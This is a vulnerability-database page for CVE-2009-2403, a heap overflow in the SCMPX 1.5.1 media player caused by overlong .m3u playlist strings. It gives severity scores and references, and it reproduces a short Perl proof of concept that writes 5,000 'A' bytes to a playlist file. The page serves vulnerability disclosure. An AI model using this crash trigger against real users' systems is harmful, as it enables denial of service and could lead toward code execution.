CVE-2009-2403 : Detail

CVE-2009-2403

Overflow
2.18%V3
Network
2009-07-09
14h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Heap-based buffer overflow in SCMPX 1.5.1 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long string in a .m3u playlist file.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-787 Out-of-bounds Write
The product writes data past the end, or before the beginning, of the intended buffer.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 9033

Publication date : 2009-06-28 22h00 +00:00
Author : hack4love
EDB Verified : Yes

#!/usr/bin/perl # # # ############################################################################### # SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC # ############################################################################### # Found By :: HACK4LOVE ## Olly registers #EAX 00A71FF8 #ECX 41414141 _____>>control over the register #EDX 41414141 #EBX 00000180 #ESP 0012E758 #EBP 0012E778 #ESI 00000008 #EDI 00000017 #EIP 00465B25 SCMPX.00465B25 ################################################################################## my $crash="\x41" x 5000; open(myfile,'>>hack4love.M3U'); print myfile $crash; ################################################################################## # milw0rm.com [2009-06-29]

Products Mentioned

Configuraton 0

Shinjichiba>>Scmpx >> Version 1.5.1

References

http://www.exploit-db.com/exploits/9033
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2009/1729
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/35596
Tags : third-party-advisory, x_refsource_SECUNIA